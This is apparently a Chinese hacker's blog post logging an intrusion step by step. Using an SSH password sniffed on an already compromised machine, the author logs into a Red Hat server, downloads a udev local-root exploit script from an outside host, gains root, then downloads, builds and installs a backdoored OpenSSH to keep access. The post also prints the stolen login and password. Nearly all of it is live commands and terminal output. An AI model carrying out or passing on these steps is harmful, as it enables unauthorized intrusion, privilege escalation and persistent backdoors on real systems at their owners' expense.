今天发现一台肉鸡上某人的ssh连到另外一台服务器上,记录下了密码。
[root@mail ~]# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11
直接ssh上去。
[root@mail ~]# ssh ldc@222.222.66.11
ldc@222.222.66.11s password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel
on an m
[ldc@localhost ldc]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux
是rhel5.0没升级过内核,vmsplice的local root应该可以的,不过测试了下,机器挂了,换udev的好了。
[ldc@localhost ldc]$ mkdir .v
[ldc@localhost ldc]$ cd .v
[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
–13:21:09– http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80… .. 200 OK
366 (3.3K) [application/x-sh]
Saving to: `u.sh’
100%[===========================================================================================>] 3,366 --.-K/s in 0.04s
13:21:09 (93.7 KB/s) - `u.sh saved [3366/3366]
[ldc@localhost .v]$ ls
r00t r00t.c u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk Eth Pid Groups Rmem Wmem Dump Locks
f69f8800 0 2486 00000111 0 0 00000000 2
f7fdae00 0 0 00000000 0 0 00000000 2
c2132200 6 0 00000000 0 0 00000000 2
f6a57a00 7 2143 00000001 0 0 00000000 2
f7caf000 7 0 00000000 0 0 00000000 2
f6a0be00 9 2143 00000000 0 0 00000000 2
f6a61200 9 1996 00000000 0 0 00000000 2
f7de1c00 9 0 00000000 0 0 00000000 2
f7d6ca00 10 0 00000000 0 0 00000000 2
f7fb3200 11 0 00000000 0 0 00000000 2
c2154200 15 476 ffffffff 0 0 00000000 2
f7fdac00 15 0 00000000 0 0 00000000 2
f7fb3000 16 0 00000000 0 0 00000000 2
c21cde00 18 0 00000000 0 0 00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d
ldc 3462 0.0 0.0 4128 680 pts/0 S 13:00 0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c:
suid.c:3:
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
已经是root权限了。
sh-3.1# w
13:25:18 up 48 min, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ldc pts/0 100.204.107.20 13:05 0.00s 0.12s 0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
我们先留个ssh的后门。
sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
–13:32:08– http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80… 200 OK
79990 (957K) [application/x-gzip]
Saving to: `openssh4.3p2.tar.gz’
100%
[===========================================================================================>] 979,990 1.14M/s in 0.8s
13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz saved [979990/979990]
sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............(省略若干行)
sh-3.1# make && make install
conffile=`echo sshd_config.out | sed s/.out$//`;
/bin/sed -e s|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g -e
............(省略若干行)
sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd restart
STOP sshd [OK]
START sshd [OK]
ok了,用我们的sshdoor登录。
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod &
